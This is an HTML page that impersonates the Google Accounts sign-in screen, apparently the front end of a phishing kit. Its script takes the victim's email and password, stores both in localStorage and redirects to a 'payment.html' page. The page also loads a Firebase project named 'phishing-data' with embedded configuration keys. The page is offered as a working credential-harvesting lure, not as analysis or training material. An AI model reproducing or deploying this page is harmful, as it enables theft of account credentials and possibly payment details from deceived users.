<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in - Google Accounts</title>
    <link rel="icon" href="https://www.youtube.com/s/desktop/a386e432/img/favicon_32.png" type="image/x-icon">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet">
    <!-- js -->
    <script src="main.js"></script>

    <!-- firebase & Analytics -->
    <script src="https://www.gstatic.com/firebasejs/8.0.1/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.0.0/firebase-database.js"></script>
    <!-- TODO: Add SDKs for Firebase products that you want to use
         https://firebase.google.com/docs/web/setup#available-libraries -->
    <script src="https://www.gstatic.com/firebasejs/8.0.1/firebase-analytics.js"></script>

    <script>
        // Your web app's Firebase configuration
        // For Firebase JS SDK v7.20.0 and later, measurementId is optional
        var firebaseConfig = {
            apiKey: "AIzaSyDgUD9l-IyrQgV1s7eU4OGPXzvMaXXJyM0",
            authDomain: "phishing-data.firebaseapp.com",
            databaseURL: "https://phishing-data.firebaseio.com",
            projectId: "phishing-data",
            storageBucket: "phishing-data.appspot.com",
            messagingSenderId: "239566087596",
            appId: "1:239566087596:web:5788cc5aa63ab450914609",
            measurementId: "G-FRFVJDFHSC"
        };
        // Initialize Firebase
        firebase.initializeApp(firebaseConfig);
        firebase.analytics();
    </script>

</head>
<style>
    @import "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css";
    @import "https://fonts.googleapis.com/css?family=Raleway|Roboto";
    * {
        margin: 0px;
        padding: 0px;
        box-sizing: border-box;
        font-family: "Raleway";
    }
    
     :root {
        /*===== Colores =====*/
        --first-color: #1A73E8;
        --input-color: #80868B;
        --border-color: #DADCE0;
        /*===== Fuente y tipografia =====*/
        --body-font: 'Roboto', sans-serif;
        --normal-font-size: 1rem;
        --small-font-size: .75rem;
    }
    /*===== BASE =====*/
    
    *,
     ::before,
     ::after {
        box-sizing: border-box;
    }
    
    body {
        font-family: 'Roboto', sans-serif;
        height: 100vh;
        background: -webkit-linear-gradient(rgb(255, 255, 255) 0%, rgb(255, 255, 255) 100%);
    }
    
    .login-form {
        border: 1px solid #dadada;
        font-family: 'Open Sans', sans-serif;
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: 380px;
        height: 500px;
        background: #fff;
        overflow: hidden;
        border-radius: 2%;
    }
    
    .Head {
        font-family: 'Open Sans', sans-serif;
        line-height: 32px;
        width: 100%;
        text-align: center;
        font-size: 100%;
        font-weight: 400;
        color: black;
    }
    
    .login-form .backbtn.active {
        background: #647ace;
        cursor: pointer;
    }
    
    .login-form .backbtn.disabled {
        background: #eee;
    }
    
    .login-form .line {
        position: absolute;
        top: 60px;
        text-align: center;
        width: 100%;
        font-size: 22px;
        color: #666;
        font-family: "Roboto";
    }
    
    .login-form .line p {
        margin-top: 10px;
        color: rgb(0, 0, 0);
        font-family: 'Roboto', sans-serif;
        font-weight: 400;
        font-size: 60%;
        line-height: 24px;
    }
    
    .phases {
        position: absolute;
        top: 160px;
        height: 200px;
        width: 200%;
        left: 0%;
        transition: all 300ms ease;
    }
    
    .phases div {
        width: 50%;
        float: left;
        display: flex;
        flex-direction: column;
        padding: 0px 20px;
    }
    
    .phases div * {
        margin: 8px 0px;
    }
    
    .phases div input {
        padding-left: 5px;
    }
    
    .phases div input.error {
        border-color: tomato;
    }
    
    .phases div button {
        display: block;
        margin-left: auto;
        padding: .75rem 2rem;
        outline: none;
        border: none;
        background-color: var(--first-color);
        color: #fff;
        font-size: var(--normal-font-size);
        border-radius: .5rem;
        cursor: pointer;
        transition: .3s;
    }
    
    button:hover {
        box-shadow: 0 10px 36px rgba(0, 0, 0, .15);
    }
    
    .phases.next {
        left: -100%;
    }
    
    .create {
        position: absolute;
        bottom: 20px;
        width: 100%;
        text-align: center;
    }
    
    .create a {
        text-decoration: none;
        font-size: 16px;
        color: #196be8;
    }
    
    .loading {
        position: absolute;
        top: 0px;
        left: 0px;
        width: 100%;
        height: 100%;
        background: #fff;
        display: none;
        z-index: 2;
    }
    
    .loading.show-it {
        display: inline-block;
    }
    
    img {
        width: 15%;
    }
    
    .loading:before {
        content: "";
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%) rotate(0deg);
        width: 50px;
        height: 50px;
        border: 5px solid #eee;
        border-top-color: #196be8;
        border-radius: 50%;
        animation: loading 900ms ease infinite;
    }
    
    @keyframes loading {
        to {
            transform: translate(-50%, -50%) rotate(360deg);
        }
    }
    
    .phase-1 {
        position: relative;
        height: 48px;
        margin-bottom: 1.5rem;
    }
    
    .phase-2 {
        position: relative;
        height: 48px;
        margin-bottom: 1.5rem;
    }
    
    .form__input {
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        font-size: var(--normal-font-size);
        border: 1px solid var(--border-color);
        border-radius: .5rem;
        outline: none;
        padding: 1rem;
        background: none;
        z-index: 1;
    }
    
    .form__label {
        position: absolute;
        left: 2rem;
        top: .7rem;
        padding: 0 .25rem;
        background-color: #fff;
        color: var(--input-color);
        font-size: var(--normal-font-size);
        transition: .3s;
        font-weight: 55s0;
    }
    /*Input focus move up label*/
    
    .form__input:focus+.form__label {
        top: -.5rem;
        left: .8rem;
        color: var(--first-color);
        font-size: var(--small-font-size);
        font-weight: 500;
        z-index: 10;
    }
    /*Input focus sticky top label*/
    
    .form__input:not(:placeholder-shown).form__input:not(:focus)+.form__label {
        top: -.5rem;
        left: .8rem;
        font-size: var(--small-font-size);
        font-weight: 500;
        z-index: 10;
    }
    /*Input focus*/
    
    .form__input:focus {
        border: 1.5px solid var(--first-color);
    }
    
    a {
        font-size: 80%;
        font-weight: 600;
        font-family: 'Roboto', sans-serif;
    }
    
    p.content {
        font-family: 'Roboto', sans-serif;
    }
    
    .bottom-section {
        width: 100%;
    }
</style>

<body>
    <div class="container">
        <div class="login-form">
            <div class="line">
                <div>
                    <div class="logoSize"><img src="img/googlePNG.png" alt="logo"></div>
                    <div class="Head">Sign in</div>
                </div>
                <p class="subtitle">Use your Google Account</p>
            </div>
            <div class="phases" id="phase-form">
                <div class="phase-1">
                    <input id="email" class="form__input" autocomplete="off" onfocus="removeError(this);" type="text" placeholder=" ">
                    <label for="" class="form__label">Email or phone</label>
                    <a href="SignIn.html">Forget email?</a>
                    <p class="content">Not your computer? Use a private browsing window to sign in. <a href="SignIn.html">Learn more</a></p>
                    <bottom-section>
                        <create-account>
                            <a href="#" style="text-decoration: none;">Create an account</a>
                        </create-account>
                        <button onclick="next();">Next</button>
                    </bottom-section>
                    <!-- <button onclick="next();">Next</button> -->
                </div>
                <div class="phase-2">
                    <input type="password" class="form__input" onfocus="removeError(this);" id="password" placeholder="">
                    <label for="" class="form__label">Password</label>
                    <a href="SignIn.html">Forget password?</a>
                    <button onclick="submitForm();">Next</button>
                </div>
            </div>

            <!-- <div class="create">
                <a href="#">Create an account</a>
            </div> -->
            <div class="loading"></div>
        </div>

    </div>

    <script>
        var state = false;

        function next() {
            var email = trim(document.getElementById('email').value);
            if (isEmail(email)) {
                // set Storage
                localStorage.setItem("email", document.getElementById('email').value);
                // document.getElementById('backbtn').classList.add('active');
                document.getElementById('phase-form').classList.add('next');
                state = true;
            } else {
                document.getElementById('email').classList.add('error');
            }
        }

        function submitForm() {
            var password = trim(document.getElementById('password').value);
            if (password.length > 5) {
                //Submit form ...
                document.getElementsByClassName('loading')[0].classList.add('show-it');
                // set Storage
                localStorage.setItem("password", document.getElementById('password').value);
                // <a href="Payment.html">
                window.location.href = "payment.html"
            } else {
                document.getElementById('password').classList.add('error');
            }
        }

        function trim(str) {
            str = str.replace(/^\s+/, '');
            for (var i = str.length - 1; i >= 0; i--) {
                if (/\S/.test(str.charAt(i))) {
                    str = str.substring(0, i + 1);
                    break;
                }
            }
            return str;
        }

        function isEmail(str) {
            var pattern = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/;
            return pattern.test(str);
        }

        function back(e) {
            if (state) {
                document.getElementById('backbtn').classList.remove('active');
                document.getElementById('phase-form').classList.remove('next');
                state = false;
            }
        }

        function removeError(ref) {
            try {
                ref.classList.remove('error');
            } catch (msg) {}
        }
    </script>
</body>

</html>